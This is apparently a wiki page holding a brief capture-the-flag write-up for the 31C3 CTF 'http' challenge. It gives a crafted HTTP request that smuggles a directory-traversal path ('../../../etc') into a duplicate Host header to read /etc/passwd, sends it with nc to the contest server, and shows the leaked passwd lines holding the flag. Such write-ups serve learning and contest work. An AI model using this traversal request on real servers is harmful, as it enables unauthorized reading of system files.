Login
Immutable PageDiscussionInfoAttachments

Revision 1 as of 2014-12-30 05:59:55

Clear message
CTF/Writeup/31C3 CTF/http

MMA

http

次の内容を改行CRLFで送信する。

GET /passwd HTTP/1.1
Host: ../../../../../../../../../etc
Host: works.90.31c3ctf.aachen.ccc.de

% cat exploit | nc works.90.31c3ctf.aachen.ccc.de 80
HTTP/1.0 200 OK

...
user:x:1000:1000:user,,,:/home/user:/bin/bash
flag:x:1001:1001:31C3_b45fa9e4d5969e3c524bdcde15f84125:/home/flag: